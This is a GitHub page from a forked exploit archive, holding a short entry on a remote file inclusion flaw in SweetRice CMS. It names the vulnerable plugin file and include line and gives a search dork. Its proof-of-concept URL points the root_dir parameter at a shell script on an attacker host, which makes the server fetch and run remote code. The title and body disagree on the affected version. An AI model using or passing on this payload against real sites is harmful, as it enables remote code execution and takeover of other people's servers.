forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10043.txt
18 lines (15 loc) · 797 Bytes
/
10043.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
SweetRice <= 0.5.3 Remote File Include Vulnerability
====================================================
########################################################################
#SweetRice <= 0.5.0 Remote File Include Vulnerability
#Download Script : http://php.opensourcecms.com/scripts/redirect/download.php?id=353
#Dork : die("lamers attempt"); :P
########################################################################
#
#Vuln : ./sweetrice/_plugin/subscriber/inc/post.php (line 2)
# <?php
# include_once($root_dir."_plugin/fckeditor/fckeditor.php") ;
# ?>
#PoC : http://server/_plugin/subscriber/inc/post.php?root_dir=http://[attacker]/shell.txt???
#
########################################################################